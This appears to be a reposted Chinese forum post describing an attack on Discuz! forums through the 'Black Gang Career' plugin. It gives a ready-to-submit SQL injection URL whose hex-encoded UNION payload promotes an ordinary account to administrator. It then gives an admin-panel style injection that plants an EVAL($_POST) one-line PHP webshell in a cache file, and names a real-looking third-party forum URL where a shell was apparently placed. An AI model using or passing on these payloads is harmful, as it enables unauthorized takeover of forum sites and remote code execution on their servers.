Discuz!黑道生涯插件注射漏洞
Discuz!黑道生涯插件注射漏洞 转载请说明出处 www.7747.net 转Tools.net的 小弟弟lost测试成功。 注册一个论坛ID 先到黑道生涯打劫 提交页面 blackband.php?mode=yule&action=enjoy&id=2 and 1=2 union select 1,0x2D312C67726F757069643D312C61646D696E69643D31,3,4/ 提升到管理员 discuz7.0.0后台得webshell方法 到后台界面,默认皮肤。,提交 OLDJUN', '#999');EVAL($_POST);// 一句话 一句话地址 forumdata/cache/style_1.php 本人只是测试,测试成功就放弃不搞其他的了,记录下就行。拿着人家的洞子搞,丢人,知道吗。感觉心里不平衡。 测试论坛 http://www.hrlife.net/forumdata/cache/lost.php
页:
[1]